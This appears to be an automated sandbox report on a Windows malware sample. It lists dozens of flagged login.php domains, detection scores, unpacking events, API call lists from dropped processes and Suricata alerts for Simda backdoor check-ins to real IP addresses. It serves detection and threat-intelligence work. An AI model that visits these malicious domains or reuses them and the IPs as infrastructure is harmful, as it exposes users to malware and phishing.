    Source: http://lyrywoj.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vojyjyc.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://vowydef.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lysyvax.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qeqyxov.com/login.phpAvira URL Cloud: Label: malware
    Source: http://pumyjig.com/login.phpAvira URL Cloud: Label: malware
    Source: http://puvywav.com/Avira URL Cloud: Label: malware
    Source: http://lygyxun.com/login.phpAvira URL Cloud: Label: malware
    Source: http://puzytul.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vocygim.com/Avira URL Cloud: Label: malware
    Source: http://vofydac.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lygysij.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qekyhil.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gadykos.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vocyruk.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://lymyner.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gahyvab.com/login.phpAvira URL Cloud: Label: malware
    Source: http://pupyguq.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lyrymuj.com/Avira URL Cloud: Label: malware
    Source: http://lygysij.com/Avira URL Cloud: Label: malware
    Source: http://qedyhyl.com/login.phpAvira URL Cloud: Label: malware
    Source: http://pujycil.com/login.phpAvira URL Cloud: Label: malware
    Source: http://pujyteq.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qexynyp.com/Avira URL Cloud: Label: malware
    Source: http://qegylep.com/pXAvira URL Cloud: Label: malware
    Source: http://qetyvil.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qedyfyq.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gadyniw.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qetyxiq.com/Avira URL Cloud: Label: malware
    Source: http://volykyc.com/http://qeqysag.com/http://ganypih.com/http://lymysan.com/http://lymysan.com/http:Avira URL Cloud: Label: malware
    Source: http://lyxygur.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gaqyres.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gadyhoh.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vonyryc.com/login.phpgAvira URL Cloud: Label: malware
    Source: http://pujyjav.com/http://qebytiq.com/http://vopybyt.com/http://gatyvyz.com/http://lyvytuj.com/http:Avira URL Cloud: Label: phishing
    Source: https://puzylyp.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vojyjof.com/http://gahyhob.com/HAvira URL Cloud: Label: malware
    Source: http://vopybyt.com/Avira URL Cloud: Label: malware
    Source: http://qeqyxyp.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gahynuw.com/login.phpAvira URL Cloud: Label: malware
    Source: http://pumyjip.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lygyjuj.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lyvytud.com/Avira URL Cloud: Label: phishing
    Source: http://lyxyxox.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qedykiv.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vocypok.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qetyveq.com/login.phpAvira URL Cloud: Label: malware
    Source: http://ww25.lyxynyx.com/login.php?subid1=20241112-0433-4491-9018-901015a08e06Avira URL Cloud: Label: malware
    Source: http://puvydov.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gahyqub.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qekyqop.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lysyfyj.com/login.phpAvira URL Cloud: Label: malware
    Source: http://volyquk.com/login.phpAvira URL Cloud: Label: malware
    Source: http://puzyxip.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qegyhig.com/login.phprAvira URL Cloud: Label: malware
    Source: http://qegyhig.com/login.phpcAvira URL Cloud: Label: malware
    Source: http://lyryvex.com/login.phpgAvira URL Cloud: Label: malware
    Source: http://lyxywen.com/Avira URL Cloud: Label: malware
    Source: http://gacynuz.com/login.phpAvira URL Cloud: Label: malware
    Source: http://galyqaz.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lymysan.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://gacyzuz.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://gahyhys.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gahyzez.com/login.phpAvira URL Cloud: Label: malware
    Source: http://pupybul.com/HAvira URL Cloud: Label: malware
    Source: http://volyzic.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lykyjad.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gatyfus.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qebyrev.com/login.phprAvira URL Cloud: Label: malware
    Source: http://volydot.com/login.phpAvira URL Cloud: Label: phishing
    Source: http://vojycec.com/Avira URL Cloud: Label: malware
    Source: http://ganyfes.com/login.phpAvira URL Cloud: Label: malware
    Source: http://pujygug.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vocydyc.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lykyvod.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lyxywer.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lykymij.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lysyvan.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lykyfen.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lykywid.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qexylup.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lyvyxyj.com/login.phpAvira URL Cloud: Label: malware
    Source: http://pumydyg.com/login.phpAvira URL Cloud: Label: malware
    Source: http://lymyjon.com/login.phpAvira URL Cloud: Label: malware
    Multi AV Scanner detection for submitted file
    Source: arxtPs1STE.exeReversingLabs: Detection: 84%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
    Machine Learning detection for sample
    Source: arxtPs1STE.exeJoe Sandbox ML: detected

    Compliance

    barindex
    Detected unpacking (creates a PE file in dynamic memory)
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeUnpacked PE file: 6.2.tGYLgZxMWmmBTD.exe.880000.2.unpack
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeUnpacked PE file: 20.2.tGYLgZxMWmmBTD.exe.2560000.2.unpack
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeUnpacked PE file: 22.2.tGYLgZxMWmmBTD.exe.1280000.2.unpack
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeUnpacked PE file: 26.2.tGYLgZxMWmmBTD.exe.1340000.2.unpack
    Detected unpacking (overwrites its own PE header)
    Source: C:\Users\user\Desktop\arxtPs1STE.exeUnpacked PE file: 0.2.arxtPs1STE.exe.400000.2.unpack
    Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.1.unpack
    Source: arxtPs1STE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.8:49719 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49729 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:50111 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:50114 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:50115 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:50116 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:57741 version: TLS 1.2
    Source: Binary string: com.lysyvaxhttp://vocyzit.com/login.phpndows Defender\DLL\wkernel32.pdbb source: svchost.exe, 00000002.00000002.2658367884.0000000003A60000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ?\\??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb source: svchost.exe, 00000002.00000003.2567119423.000000000B471000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: com.lyxyjodhttp://qetyfuv.com/login.phpndows Defender\DLL\wkernel32.pdbb source: svchost.exe, 00000002.00000002.2658367884.0000000003A60000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.2667307547.000000000757B000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.2659791356.0000000003D71000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000002.2658440872.0000000003AB7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000002.2658440872.0000000003ABD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wkernelbase.pdb( source: svchost.exe, 00000002.00000002.2658440872.0000000003ABD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tGYLgZxMWmmBTD.exe, 00000005.00000002.1826646518.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000006.00000000.1751652586.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000009.00000002.1852846193.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 0000000D.00000000.1771895214.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000011.00000000.1782019085.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000014.00000000.1788796306.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000016.00000002.1811967690.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000018.00000000.1809196113.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 0000001A.00000000.1825252070.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 0000001D.00000002.1875987559.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 0000001F.00000000.1845068573.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000022.00000002.1917724112.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000027.00000002.1905806801.000000000019E000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000003.2569536578.00000000029C9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: l\winsta.pdb source: svchost.exe, 00000002.00000003.2567119423.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2675415651.000000000B472000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000002.2658440872.0000000003AB7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000003.2569536578.00000000029C9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: http://vonypom.com/login.phpndows Defender\dll\WinSCard.pdbdb source: svchost.exe, 00000002.00000002.2658367884.0000000003A60000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.2658971503.0000000003B2D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.2659791356.0000000003D71000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb source: svchost.exe, 00000002.00000002.2675415651.000000000B472000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.2658971503.0000000003B2D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: kDJwntdll.pdb source: svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02BD9910
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB7680 GetProcessHeap,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02BB7680
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,2_2_02BDDAE8
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,2_2_02BDDA50
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCD120
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCE6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008F9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_008F9910
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008ED120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_008ED120
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008FDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_008FDAE8
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008FDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_008FDA50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D7680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_008D7680
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008EE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_008EE6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008A9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_008A9910
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0089D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0089D120
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008ADAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_008ADAE8
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008ADA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_008ADA50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00887680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_00887680
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0089E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0089E6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BFDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,9_2_02BFDAE8
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BFDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,9_2_02BFDA50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BED120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,9_2_02BED120
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BF9910 OpenMutexA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,9_2_02BF9910
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BEE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,9_2_02BEE6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD7680 OpenMutexA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,9_2_02BD7680
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDE0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02BDE0FB

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49708 -> 3.94.10.34:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49726 -> 3.94.10.34:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49714 -> 75.2.71.199:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49710 -> 208.100.26.245:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49718 -> 18.208.156.248:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49727 -> 18.208.156.248:80
    Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.8:56804
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49709 -> 199.191.50.83:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49737 -> 44.221.84.105:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49707 -> 162.255.119.102:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49735 -> 103.224.212.210:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49722 -> 154.212.231.82:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49711 -> 199.59.243.227:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49728 -> 103.150.10.48:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49716 -> 178.162.217.107:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49715 -> 44.221.84.105:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49721 -> 44.221.84.105:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49734 -> 103.224.182.252:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49736 -> 154.85.183.50:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49717 -> 91.195.240.19:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49741 -> 64.225.91.73:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49713 -> 178.162.217.107:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49712 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49725 -> 188.114.96.3:80
